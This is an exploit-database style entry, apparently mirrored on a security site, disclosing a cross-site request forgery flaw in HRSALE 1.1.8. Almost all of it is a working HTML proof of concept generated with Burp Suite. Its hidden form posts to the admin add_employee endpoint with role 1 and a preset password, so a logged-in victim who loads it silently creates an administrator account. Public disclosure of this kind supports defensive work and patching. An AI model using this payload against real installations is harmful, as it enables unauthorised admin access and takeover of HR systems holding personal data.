HRSALE 1.1.8 Exploit, Cross-Site Request Forgery (Add Admin)

# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-11
# Exploit Author: Ismail Akıcı
# Vendor Homepage: http://hrsale.com/
# Software Link : http://demo.hrsale.com/
# Software : HRSALE v1.1.8
# Product Version: v1.1.8
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery

# Description :
# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
# With this vulnerability, authorized users can be added to the system.

HTML CSRF PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="_user" value="1" />
      <input type="hidden" name="csrf_hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
      <input type="hidden" name="first_name" value="Ismail" />
      <input type="hidden" name="last_name" value="Akici" />
      <input type="hidden" name="company_id" value="1" />
      <input type="hidden" name="location_id" value="1" />
      <input type="hidden" name="username" value="ismailtakici" />
      <input type="hidden" name="email" value="ismail.akici@gmail.com" />
      <input type="hidden" name="date_of_birth" value="2020-03-11" />
      <input type="hidden" name="contact_no" value="5554443322" />
      <input type="hidden" name="employee_id" value="1" />
      <input type="hidden" name="date_of_joining" value="2020-03-11" />
      <input type="hidden" name="department_id" value="1" />
      <input type="hidden" name="subdepartment_id" value="YES" />
      <input type="hidden" name="designation_id" value="9" />
      <input type="hidden" name="gender" value="Male" />
      <input type="hidden" name="office_shift_id" value="1" />
      <input type="hidden" name="password" value="Test1234!" />
      <input type="hidden" name="confirm_password" value="Test1234!" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="leave_categories[]" value="0" />
      <input type="hidden" name="leave_categories[]" value="1" />
      <input type="hidden" name="address" value="Test Address" />
      <input type="hidden" name="is_ajax" value="1" />
      <input type="hidden" name="add_type" value="employee" />
      <input type="hidden" name="form" value="add_employee" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD